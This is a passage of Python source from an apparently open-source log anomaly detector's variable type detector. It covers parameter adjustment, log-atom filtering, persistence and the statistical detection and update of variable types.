'beta', 'betam', 'emp'] # List of the numbers of log lines of this eventType, when an indicator failed self.failed_indicators = [] # Stores the standardised values of all tested distributions for better performance. The list is hardcoded below self.quantiles = {} # Stores the number of minimal successes for the BT for selected sample-size and probabilities. 
self.bt_min_succ_data = {} self.log_success = 0 self.log_total = 0 self.log_new_learned = 0 self.log_new_learned_values = [] self.log_updated = 0 # Initialize lists used for the tracking of the indicator if self.save_statistics: self.statistics_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, 'statistics') # List of the numbers of total parsed log lines, when an indicator failed. Only used for the statistics self.failed_indicators_total = [] # List of the confidences of the indicators self.failed_indicators_values = [] # List of the paths of the indicators self.failed_indicators_paths = [] # List of the numbers of total parsed log lines, when a variable changed its type. Only used for the statistics self.changed_var_types = [] # Stores the standardised values of all tested distributions for better performance. self.quantiles = VTDData.quantiles if self.used_multinomial_test == 'Approx': # Stores the number of minimal successes for the BT with the stated sample-sizes and probabilities self.bt_min_succ_data = VTDData.bt_min_succ_data # List of the maximal values to the significance niveau 'gof_alpha', the sample-size 'num_init' and the single # distributions in the initial KS-tests self.crit_val_ini_ks = VTDData.crit_val_ini_ks # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' and the single # distributions in the initial CM-tests self.crit_val_ini_cm = VTDData.crit_val_ini_cm # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update step and the single distributions in the s_ks-tests in the update steps self.crit_val_upd_ks = VTDData.crit_val_upd_ks # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update step and the single distributions in the s_cm-tests in the 
update steps self.crit_val_upd_cm = VTDData.crit_val_upd_cm # List of the critical distances to charactersitics of distributions. # These distances are used to prevent adapting too much on an anomalous sample in the gof tests. self.crit_dist_upd_cm = VTDData.crit_dist_upd_cm # List of the maximal values to the significance niveau 'gof_alpha', the samplesize 'num_init' in the initialization and # the samplesize 'num_s_gof_values' in the update steps for the CM-homogeneity test self.crit_val_hom_cm = VTDData.crit_val_hom_cm # List of the critical values of the durbin watson test self.crit_val_dw = VTDData.crit_val_dw if self.dw_alpha not in self.crit_val_dw: pos_vals = list(self.crit_val_dw.keys()) nearest = self.crit_val_dw[0] for val in self.crit_val_dw[1:]: if abs(self.dw_alpha - val) < abs(self.dw_alpha - nearest): nearest = val msg = f'Changed the parameter dw_alpha of the VTD from {self.dw_alpha} to {nearest} to use the pregenerated critical values ' \ f'for the dw-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.dw_alpha = nearest if num_init not in self.crit_val_dw[self.dw_alpha]: pos_vals = list(self.crit_val_dw[self.dw_alpha].keys()) nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_init - val) < abs(num_init - nearest): nearest = val msg = f'Changed the parameter num_init of the VTD from {num_init} to {nearest} to use the pregenerated critical values for ' \ f'the dw-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_init = nearest if (self.used_gof_test == 'KS' and (gof_alpha not in self.crit_val_ini_ks or gof_alpha not in self.crit_val_upd_ks)) or ( self.used_gof_test == 'CM' and (gof_alpha not in self.crit_val_ini_cm or gof_alpha not in self.crit_val_upd_cm or gof_alpha not in self.crit_val_hom_cm)): if self.used_gof_test == 'KS': pos_vals = [val for val in self.crit_val_ini_ks if val in self.crit_val_upd_ks] else: pos_vals = [val for val in 
self.crit_val_ini_cm if val in self.crit_val_upd_cm and val in self.crit_val_hom_cm] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(self.gof_alpha - val) < abs(self.gof_alpha - nearest): nearest = val msg = f'Changed the parameter gof_alpha of the VTD from {self.gof_alpha} to {nearest} to use the pregenerated critical ' \ f'values for the gof-tests' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.gof_alpha = nearest if (self.used_gof_test == 'KS' and (num_init not in self.crit_val_ini_ks[self.gof_alpha] or num_init not in self.crit_val_upd_ks[self.gof_alpha])) or ( self.used_gof_test == 'CM' and (num_init not in self.crit_val_ini_cm[self.gof_alpha] or num_init not in self.crit_val_upd_cm[self.gof_alpha] or num_init not in self.crit_val_hom_cm[self.gof_alpha])): if self.used_gof_test == 'KS': pos_vals = [val for val in self.crit_val_ini_ks[self.gof_alpha] if val in self.crit_val_upd_ks[self.gof_alpha]] else: pos_vals = [val for val in self.crit_val_ini_cm[self.gof_alpha] if val in self.crit_val_upd_cm[self.gof_alpha] and val in self.crit_val_hom_cm[self.gof_alpha]] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_init - val) < abs(num_init - nearest): nearest = val msg = f'Changed the parameter num_init of the VTD from {num_init} to {nearest} to use the pregenerated critical values for' \ f' the gof-tests' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_init = nearest if (self.used_gof_test == 'KS' and (num_s_gof_values not in self.crit_val_upd_ks[self.gof_alpha][self.num_init])) or ( self.used_gof_test == 'CM' and (num_s_gof_values not in self.crit_val_upd_cm[self.gof_alpha][self.num_init] or num_s_gof_values not in self.crit_val_hom_cm[self.gof_alpha][self.num_init])): if self.used_gof_test == 'KS': pos_vals = list(self.crit_val_upd_ks[self.gof_alpha][self.num_init].keys()) else: pos_vals = [val for val in 
self.crit_val_upd_cm[self.gof_alpha][self.num_init] if val in self.crit_val_hom_cm[self.gof_alpha][self.num_init]] nearest = pos_vals[0] for val in pos_vals[1:]: if abs(num_s_gof_values - val) < abs(num_s_gof_values - nearest): nearest = val msg = f'Changed the parameter num_s_gof_values of the VTD from {num_s_gof_values} to {nearest} to use pregenerated ' \ f'critical values for the gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.num_s_gof_values = nearest # Test if the ETD saves the values if not self.event_type_detector.save_values: msg = 'Changed the parameter save_values of the VTD from False to True to properly use the PathArimaDetector' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.save_values = True # Test if the ETD saves enough values if self.event_type_detector.min_num_vals < max(self.num_init, self.num_update, self.num_s_gof_values): msg = f'Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to ' \ f'{max(self.num_init, self.num_update, num_s_gof_values)} to use pregenerated critical values for the VTDs gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.min_num_vals = max(self.num_init, self.num_update, self.num_s_gof_values) # Test if the ETD saves enough values if self.event_type_detector.max_num_vals < max(self.num_init, self.num_update, self.num_s_gof_values) + 500: msg = f'Changed the parameter max_num_vals of the ETD from {self.event_type_detector.max_num_vals} to ' \ f'{max(self.num_init, self.num_update, self.num_s_gof_values) + 500} to use pregenerated critical values for the VTDs' \ f' gof-test' logging.getLogger(DEBUG_LOG_NAME).warning(msg) print('WARNING: ' + msg, file=sys.stderr) self.event_type_detector.max_num_vals = max(self.num_init, self.num_update, self.num_s_gof_values) + 500 # Loads the persistence 
self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() # Generate the modifiers for the estimation of the minimum and maximum for the uniform distribution self.min_mod_ini_uni = 1 / (self.num_init + 1) self.min_mod_upd_uni = 1 / (self.num_init + self.num_update + 1) self.max_mod_ini_uni = 1 / (self.num_init + 1) self.max_mod_upd_uni = 1 / (self.num_init + self.num_update + 1) # Generate the modifiers for the estimation of the minimum and maximum for the beta1 distribution self.min_mod_ini_beta1 = self.quantiles['beta1'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta1 = self.quantiles['beta1'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta1 = 1 - self.quantiles['beta1'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta1 = 1 - self.quantiles['beta1'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] # Generate the modifiers for the estimation of the minimum and maximum for the beta2 distribution self.min_mod_ini_beta2 = self.quantiles['beta2'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.min_mod_upd_beta2 = self.quantiles['beta2'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] self.max_mod_ini_beta2 = 1-self.quantiles['beta2'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)] self.max_mod_upd_beta2 = 1-self.quantiles['beta2'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)] # Generate the modifiers for the estimation of the minimum and maximum for the beta4 distribution self.min_mod_ini_beta4 = self.quantiles['beta4'][max(0.001, int(1 / (self.num_init + 1) * 1000 + 0.5) / 1000)] 
# Tail of __init__ (this statement run starts on the preceding, collapsed line).
# Modifiers for the minimum/maximum estimates of the 'beta4' distribution, looked up in the
# pregenerated VTDData.quantiles table. The lookup key, 1/(n+1) for the minimum and n/(n+1) for
# the maximum, is rounded to three decimals and clamped to [0.001, 0.999] so that it always hits a
# table entry (the table is presumably keyed by 3-decimal probabilities); 'ini' uses n = num_init
# samples, 'upd' n = num_init + num_update.
# NOTE(review): how detect_var_type/update_var_type apply these modifiers is not visible here.
self.min_mod_upd_beta4 = self.quantiles['beta4'][max(0.001, int(1 / (self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)]
self.max_mod_ini_beta4 = 1-self.quantiles['beta4'][min(0.999, int(self.num_init / (self.num_init + 1) * 1000 + 0.5) / 1000)]
self.max_mod_upd_beta4 = 1-self.quantiles['beta4'][min(0.999, int((self.num_init + self.num_update) / ( self.num_init + self.num_update + 1) * 1000 + 0.5) / 1000)]

def receive_atom(self, log_atom) -> bool:
    """Receive a parsed log atom and hand it to the variable type tracking of its event type.

    Filtering happens in this order; each early exit returns False:
    1. the atom's log resource name is listed in log_resource_ignore_list (exact match),
    2. the EventTypeDetector reports no current event index (-1),
    -- learn-mode bookkeeping and the log_total counter are updated here, so exits 3 and 4
       still count the atom in log_total --
    3. a parser path from ignore_list occurs in the match dictionary,
    4. no target_path_list is configured, constraint_list is non-empty and none of its paths
       occurs in the match dictionary (constraint_list is not consulted when a target_path_list
       is set).
    For an event type seen for the first time the per-event-type bookkeeping lists are created
    (growing them with empty placeholders up to event_index), then process_ll() is called.
    @param log_atom the parsed log atom; its atom_time drives the learn-mode deadline.
    @return True if the atom was processed by process_ll(), False if it was skipped.
    """
    for source in self.log_resource_ignore_list:
        if log_atom.source.resource_name == source:
            return False
    # The ETD must have classified this atom first; -1 means it did not accept it.
    event_index = self.event_type_detector.current_index
    if event_index == -1:
        return False
    # The stop-learning deadline is anchored to the atom_time of the first atom seen, i.e. to log
    # time rather than wall-clock time. NOTE(review): if atom_time is parsed from the log line,
    # the log source controls when learning stops — confirm this is the intended trust model.
    # stop_learning_no_anomaly_time is only used as the initial deadline here; any extension on
    # anomalies would have to happen in another method (not visible in this block).
    if not self.stop_learning_time_initialized:
        self.stop_learning_time_initialized = True
        if self.stop_learning_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_time
        elif self.stop_learning_no_anomaly_time is not None:
            self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time
    if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time:
        logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__)
        self.learn_mode = False
    self.log_total += 1
    parser_match = log_atom.parser_match
    # Skip paths from ignore_list.
    for ignore_path in self.ignore_list:
        if ignore_path in parser_match.get_match_dictionary().keys():
            return False
    # Without a target_path_list, constraint_list acts as an allow-list: at least one constraint
    # path has to be present in the match for the atom to be processed.
    if self.target_path_list is None or len(self.target_path_list) == 0:
        constraint_path_flag = False
        for constraint_path in self.constraint_list:
            if parser_match.get_match_dictionary().get(constraint_path) is not None:
                constraint_path_flag = True
                break
        if not constraint_path_flag and self.constraint_list != []:
            return False
    # Initialize new entries in lists for a new eventType if necessary. The lists are indexed by
    # the ETD's event_index, so they are padded with empty placeholders up to that index; the slot
    # is (re)filled whenever var_type[event_index] is still the empty placeholder.
    if len(self.length) < event_index + 1 or self.var_type[event_index] == []:
        for _ in range(event_index + 1 - len(self.length)):
            self.length.append(0)
            self.variable_path_num.append([])
            self.var_type.append([])
            self.alternative_distribution_types.append([])
            self.distr_val.append([])
            self.bt_results.append([])
        # Number of variables
        self.length[event_index] = len(self.event_type_detector.variable_key_list[event_index])
        # List of the found vartypes
        self.var_type[event_index] = [[] for i in range(self.length[event_index])]
        # Stores the alternative distributions of the variable
        self.alternative_distribution_types[event_index] = [[] for i in range(self.length[event_index])]
        # Stores the values the distribution, which are needed for the s_gof
        self.distr_val[event_index] = [[] for i in range(self.length[event_index])]
        # List of the successes of the binomial test for the rejection in the s_gof or variables of discrete type
        self.bt_results[event_index] = [[] for i in range(self.length[event_index])]
        # Adds the variable indices to the variable_path_num-list if the target_path_list is not empty.
        # Note: an empty (non-None) target_path_list selects no variables at all.
        if self.target_path_list is not None:
            for var_index in range(self.length[event_index]):
                if self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list:
                    self.variable_path_num[event_index].append(var_index)
    if self.num_events < event_index + 1:
        self.num_events = event_index + 1
    # Processes the current log-line by testing and updating
    self.process_ll(event_index, log_atom)
    return True

def do_timer(self, trigger_time):
    """Check if current ruleset should be persisted.

    Persists via do_persist() once next_persist_time has been reached and then schedules the next
    run one persistence period (config KEY_PERSISTENCE_PERIOD, default DEFAULT_PERSISTENCE_PERIOD)
    after trigger_time.
    NOTE(review): while next_persist_time is None this method only reports the period and never
    persists or sets next_persist_time; it is presumably set elsewhere (e.g. when learning changes
    state) — confirm, otherwise data is only written at shutdown.
    @param trigger_time the current timer time.
    @return seconds until this timer should fire again.
    """
    if self.next_persist_time is None:
        return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
    delta = self.next_persist_time - trigger_time
    if delta <= 0:
        self.do_persist()
        delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD)
        self.next_persist_time = trigger_time + delta
    return delta

def do_persist(self) -> None:
    """Immediately write persistence data to storage.

    Writes a JSON list in the positional order load_persistence_data() expects:
    [var_type, alternative_distribution_types, var_type_history_list, var_type_history_list_reference,
    failed_indicators, distr_val]. distr_val is only kept for variables of type 'emp' (empiric
    distribution); for every other variable an empty list is stored, since load_persistence_data()
    re-derives what it needs for 'betam'/'spec' variables via s_gof_get_quantiles().
    With save_statistics the indicator statistics are written to a second file.
    """
    tmp_list = [self.var_type, self.alternative_distribution_types, self.var_type_history_list, self.var_type_history_list_reference, self.failed_indicators, [[self.distr_val[event_index][var_index] if (len(self.distr_val[event_index][var_index]) > 0 and self.var_type[event_index][var_index][0] == 'emp') else [] for var_index in range(len(self.distr_val[event_index]))] for event_index in range(len(self.distr_val))]]
    PersistenceUtil.store_json(self.persistence_file_name, tmp_list)
    if self.save_statistics:
        PersistenceUtil.store_json(self.statistics_file_name, [self.failed_indicators_total, self.failed_indicators_values, self.failed_indicators_paths, self.failed_indicators])
    logging.getLogger(DEBUG_LOG_NAME).debug('%s persisted data.', self.__class__.__name__)

def load_persistence_data(self) -> None:
    """Extract the persistence data and appends various lists to create a consistent state.

    Reads the list written by do_persist() (positions 0-5, see there) and rebuilds the lists that
    are not persisted: length and variable_path_num from the ETD's variable_key_list, and
    bt_results / distribution quantiles per variable according to the restored variable type.
    NOTE(review): the loaded structure is used positionally without any shape validation and is
    assumed to match the EventTypeDetector's own persistence (variable_key_list must already
    cover num_events event types, i.e. the ETD must have loaded its state first). A truncated or
    edited persistence file, or ETD/VTD files from different runs, surface here as an IndexError at
    startup rather than as a descriptive error — confirm whether PersistenceUtil.load_json guards
    against this; the persistence directory is a trust boundary for this detector.
    """
    persistence_data = PersistenceUtil.load_json(self.persistence_file_name)
    if persistence_data is not None:
        # Import the lists of the persistence
        self.var_type = persistence_data[0]
        self.alternative_distribution_types = persistence_data[1]
        self.var_type_history_list = persistence_data[2]
        self.var_type_history_list_reference = persistence_data[3]
        self.failed_indicators = persistence_data[4]
        self.distr_val = persistence_data[5]
        self.num_events = len(self.var_type)
        # Create the initial lists which derive from the persistence
        # Number of variables of the single events
        self.length = [len(self.event_type_detector.variable_key_list[event_index]) for event_index in range(self.num_events)]
        self.variable_path_num = [[] for _ in range(self.num_events)]
        # List of the successes of the binomialtest for the rejection in the s_gof or variables of discrete type
        self.bt_results = [[[] for var_index in range(self.length[event_index])] for event_index in range(self.num_events)]
        # Updates the lists for each eventType individually
        for event_index in range(self.num_events):
            # Adds the variable indices to the variable_path_num-list if the target_path_list is not empty
            if self.target_path_list is not None:
                for var_index in range(self.length[event_index]):
                    if self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list:
                        self.variable_path_num[event_index].append(var_index)
            # Initializes the lists for the discrete distribution, or continuous distribution.
            # Continuous types start with a fully successful s_gof binomial-test window; 'betam'/'spec'
            # additionally regenerate their quantiles (distr_val was persisted empty for them).
            for var_index, var_val in enumerate(self.var_type[event_index]):
                if len(var_val) > 0:
                    if var_val[0] in self.distr_list:
                        self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt
                        if var_val[0] in ('betam', 'spec'):
                            self.s_gof_get_quantiles(event_index, var_index)
                    elif var_val[0] == 'd':
                        self.d_init_bt(event_index, var_index)
        logging.getLogger(DEBUG_LOG_NAME).debug('%s loaded persistence data.', self.__class__.__name__)

def process_ll(self, event_index, log_atom):
    """Process the log line. Extracts and appends the values of the log line to the values- list.
""" # Return if no variable is tracked in the VTD if len(self.event_type_detector.variable_key_list[event_index]) == 0 or ( self.target_path_list is not None and self.variable_path_num[event_index] == []): return # Initial detection of variable types if self.event_type_detector.num_event_lines[event_index] >= self.num_init and \ self.event_type_detector.check_variables[event_index][0] and self.var_type[event_index][0] == []: # Test all variables logging.getLogger(DEBUG_LOG_NAME).debug('%s started initial detection of var types.', self.__class__.__name__) if self.target_path_list is None: for var_index in range(self.length[event_index]): tmp_var_type = self.detect_var_type(event_index, var_index) # VarType is empiric distribution if tmp_var_type[0] == 'emp': self.var_type[event_index][var_index] = tmp_var_type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif tmp_var_type[0] in self.distr_list: self.var_type[event_index][var_index] = tmp_var_type[:-1] self.alternative_distribution_types[event_index][var_index] = tmp_var_type[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # Initializes the binomialtest for the discrete type elif tmp_var_type[0] == 'd': self.var_type[event_index][var_index] = tmp_var_type self.d_init_bt(event_index, var_index) # Mark the variables, which could be static parts of the parser model elif tmp_var_type[0] == 'stat': self.var_type[event_index][var_index] = tmp_var_type self.var_type[event_index][var_index][2] = True else: self.var_type[event_index][var_index] = tmp_var_type # Test only the variables with paths in the target_path_list else: for var_index in self.variable_path_num[event_index]: tmp_var_type = self.detect_var_type(event_index, var_index) # VarType is empiric distribution if 
tmp_var_type[0] == 'emp': self.var_type[event_index][var_index] = tmp_var_type self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt self.s_gof_get_quantiles(event_index, var_index) # VarType is a continuous distribution elif tmp_var_type[0] in self.distr_list: self.var_type[event_index][var_index] = tmp_var_type[:-1] self.alternative_distribution_types[event_index][var_index] = tmp_var_type[-1] self.bt_results[event_index][var_index] = [1] * self.num_s_gof_bt if self.var_type[event_index][var_index][0] in ('betam', 'spec'): self.s_gof_get_quantiles(event_index, var_index) # VarType is range elif tmp_var_type[0] == 'range': self.var_type[event_index][var_index] = tmp_var_type # Initializes the binomialtest for the discrete type elif tmp_var_type[0] == 'd': self.var_type[event_index][var_index] = tmp_var_type self.d_init_bt(event_index, var_index) # mMrk the variables, which could be static parts of the parser model elif tmp_var_type[0] == 'stat': self.var_type[event_index][var_index] = tmp_var_type self.var_type[event_index][var_index][2] = True else: self.var_type[event_index][var_index] = tmp_var_type self.init_var_type_history_list(event_index) self.print_initial_var_type(event_index, log_atom) self.log_new_learned += len(self.var_type[event_index]) self.log_new_learned_values.append(self.var_type[event_index]) # Update variable types elif self.event_type_detector.num_event_lines[event_index] > self.num_init and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) % self.num_update == 0: logging.getLogger(DEBUG_LOG_NAME).debug('%s started update phase of var types.', self.__class__.__name__) # Check if the updates of the variable types should be stopped if self.learn_mode and (not isinstance(self.num_stop_update, bool)) and ( self.event_type_detector.total_records >= self.num_stop_update): self.learn_mode = False # Get the index_list for the variables which should be updated index_list = None if self.target_path_list is None: 
index_list = range(self.length[event_index]) else: index_list = self.variable_path_num[event_index] self.log_updated += len(index_list) # Update the variable types and history list for var_index in index_list: # Skips the variable if check_variable is False if not self.event_type_detector.check_variables[event_index][var_index]: continue # Update variable types self.update_var_type(event_index, var_index, log_atom) # This section updates the history list of the variable types if self.var_type[event_index][var_index][0] in self.var_type_history_list_order: # Index of the variable type in the list # [others, static, [discrete, number of appended steps], # asc, desc, unique, range, ev of continuous distributions] type_index = self.var_type_history_list_order.index(self.var_type[event_index][var_index][0]) else: type_index = self.var_type_history_list_order.index('cont') for tmp_type_index, tmp_type_val in enumerate(self.var_type_history_list[event_index][var_index]): if tmp_type_index == type_index: if self.var_type_history_list_order[type_index] == 'cont': for _, val in enumerate(tmp_type_val): val.append(0) # Continuously distributed variable type. 
if self.var_type[event_index][var_index][0] == 'uni': tmp_type_val[0][-1] = ( self.var_type[event_index][var_index][1] + self.var_type[event_index][var_index][2]) / 2 tmp_type_val[1][-1] = ( self.var_type[event_index][var_index][2] - self.var_type[event_index][var_index][1]) / np.sqrt(12) else: tmp_type_val[0][-1] = self.var_type[event_index][var_index][1] tmp_type_val[1][-1] = self.var_type[event_index][var_index][2] elif self.var_type_history_list_order[type_index] == 'range': tmp_type_val[0].append(self.var_type[event_index][var_index][1]) tmp_type_val[1].append(self.var_type[event_index][var_index][2]) elif len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): tmp_type_val[0].append(1) for i in range(1, len(tmp_type_val)): tmp_type_val[i].append(0) else: tmp_type_val.append(1) else: if len(tmp_type_val) >= 1 and isinstance(tmp_type_val[0], list): for _, val in enumerate(tmp_type_val): val.append(0) else: tmp_type_val.append(0) # Reduce the number of variables, which are tracked if (self.num_updates_until_var_reduction > 0 and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update == self.num_updates_until_var_reduction - 1): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): # Skips the variable if it is already not being checked if not self.event_type_detector.check_variables[event_index][var_index]: continue tmp_max = 1 exceeded_thresh = False for type_index in range(1, len(var_val)): # Continuous Distribution if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: num_app = len([1 for x in var_val[type_index][1] if x != 0]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app # Distributions which are neither continuous nor range else: if len(var_val[type_index]) >= 1 and isinstance(var_val[type_index][0], list): num_app = 
sum(var_val[type_index][0]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app else: num_app = sum(var_val[type_index]) if num_app / self.num_updates_until_var_reduction >= self.var_reduction_thres: exceeded_thresh = True break if num_app > tmp_max: tmp_max = num_app # Remove the variable if it did not exceed the threshold if not exceeded_thresh: self.event_type_detector.check_variables[event_index][var_index] = False self.event_type_detector.values[event_index][var_index] = [] self.var_type[event_index][var_index] = [] self.var_type_history_list[event_index][var_index] = [] self.distr_val[event_index][var_index] = [] if len(self.var_type_history_list_reference) > event_index and len( self.var_type_history_list_reference[event_index]) > var_index: self.var_type_history_list_reference[event_index][var_index] = [] affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print( f'Stopped tracking the variable of event type {self.event_type_detector.get_event_type(event_index)} with ' f'Path:\n{affected_path}\nbecause of irregular variable types.', log_atom, affected_path, confidence=1 / (1 + np.exp(-4 / tmp_max)) / 0.9820137900379085) # 1 / (1 + np.exp(-4 / tmp_max)) / 0.9820137900379085 is the scaled sigmoidfunction. 
# 1 / (1 + np.exp(-4)) = 0.9820137900379085 # Saves the initial reference state of the var_type_history_list for the calculation of the indicator if ((self.num_updates_until_var_reduction == 0) or ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1) and (not isinstance(self.num_var_type_hist_ref, bool)) and ( (len(self.var_type_history_list_reference) < event_index + 1) or self.var_type_history_list_reference[event_index] == []) and ( (self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_var_type_hist_ref - 1): if len(self.var_type_history_list_reference) < event_index + 1: for i in range(event_index + 1 - len(self.var_type_history_list_reference)): self.var_type_history_list_reference.append([]) for var_index, var_val in enumerate(self.var_type_history_list[event_index]): self.var_type_history_list_reference[event_index].append([]) for type_index, type_val in enumerate(var_val): if len(type_val) >= 1 and isinstance(type_val[0], list): # Continuous variable type if type_index in [self.var_type_history_list_order.index('cont'), self.var_type_history_list_order.index('range')]: # Calculate the mean of all entries not zero self.var_type_history_list_reference[event_index][var_index].append([sum( type_val[0][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[0][ -self.num_var_type_hist_ref:] if x != 0]), 1), sum(type_val[1][-self.num_var_type_hist_ref:]) / max(len([1 for x in type_val[1][-self.num_var_type_hist_ref:] if x != 0]), 1)]) else: self.var_type_history_list_reference[event_index][var_index].append([sum(x[ -self.num_var_type_hist_ref:]) for x in type_val]) else: self.var_type_history_list_reference[event_index][var_index].append(sum(type_val[-self.num_var_type_hist_ref:])) # Check the indicator for the variable types of the Event and generates an output, if it fails else: if ((self.num_updates_until_var_reduction == 0) 
or ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1) and (not isinstance( self.num_var_type_considered_ind, bool)) and (not isinstance(self.num_var_type_hist_ref, bool)) and len( self.var_type_history_list_reference) > event_index and (self.var_type_history_list_reference[event_index] != []) and ( ((self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update - self.num_var_type_hist_ref) % self.num_var_type_considered_ind) == 0: # Shorten the var_type_history_list if len(self.var_type_history_list[event_index]) > 0 and len(self.var_type_history_list[event_index][0]) > 0 and len( self.var_type_history_list[event_index][0][0]) > max( self.num_var_type_considered_ind, self.num_var_type_hist_ref): for var_index, var_val in enumerate(self.var_type_history_list[event_index]): for type_index, type_val in enumerate(var_val): # Differentiation between the entries, which are lists (e.g. 
discrete) and values if isinstance(type_val[0], list): for i, val in enumerate(type_val): if isinstance(val, list): type_val[i] = val[-max(self.num_var_type_considered_ind, self.num_var_type_hist_ref):] else: var_val[type_index] = type_val[-max(self.num_var_type_considered_ind, self.num_var_type_hist_ref):] indicator_list = self.get_indicator(event_index) indicator = max(0, max(indicator_list)) if indicator >= self.indicator_thres: # Update the list of the failed indicators, which is used for the weights of the indicator if len(self.failed_indicators) < event_index + 1: # Extend the lists if necessary tmp_len = len(self.failed_indicators) for i in range(event_index + 1 - tmp_len): self.failed_indicators.append([[] for _ in range(len(self.var_type[tmp_len + i]))]) # Indices of the variables, which would have failed the indicator indices_failed_tests = [] for var_index in range(len(self.var_type[event_index])): if indicator_list[var_index] >= self.indicator_thres: indices_failed_tests.append(var_index) self.failed_indicators[event_index][var_index].append(self.event_type_detector.num_event_lines[event_index]) # Multiply the single values of the indicator with their corresponding weights # Number of the log line which corresponds to the first indicator, which is taken into account first_line_num = self.event_type_detector.num_event_lines[event_index] - self.num_update * \ self.num_var_type_considered_ind * (self.num_ind_for_weights + self.num_skipped_ind_for_weights) # Number of the log line which corresponds to the last indicator, which is taken into account last_line_num = self.event_type_detector.num_event_lines[event_index] - self.num_update * \ self.num_var_type_considered_ind * self.num_skipped_ind_for_weights for var_index in indices_failed_tests: lower_ind = False # Index of the lower limit of the considered values of the failed_indicator list upper_ind = False # Index of the upper limit of the considered values of the failed_indicator list for i, val in 
enumerate(self.failed_indicators[event_index][var_index]): if val >= first_line_num: lower_ind = i break if isinstance(lower_ind, bool): lower_ind = 0 upper_ind = 0 else: for i, val in enumerate(self.failed_indicators[event_index][var_index], start=lower_ind): if val >= last_line_num: upper_ind = i break if isinstance(upper_ind, bool): upper_ind = len(self.failed_indicators[event_index][var_index]) # Calculating the weight for the indicator indicator_weight = 1 / (1 + upper_ind - lower_ind) indicator_list[var_index] = indicator_list[var_index] * indicator_weight # Reduce the list of the failed indicators self.failed_indicators[event_index][var_index] = self.failed_indicators[event_index][var_index][lower_ind:] # Calculate and print the confidence of the failed indicator indicator = sum(indicator_list[var_index] for var_index in indices_failed_tests) if self.save_statistics: self.failed_indicators_total.append(log_atom.atom_time) self.failed_indicators_values.append(np.arctan(2 * indicator) / np.pi * 2) if self.event_type_detector.id_path_list != []: self.failed_indicators_paths.append(self.event_type_detector.id_path_list_tuples[event_index]) else: self.failed_indicators_paths.append(self.event_type_detector.longest_path[event_index]) tmp_string = '' affected_paths = [self.event_type_detector.variable_key_list[event_index][var_index] for var_index in indices_failed_tests] if self.var_type_history_list: 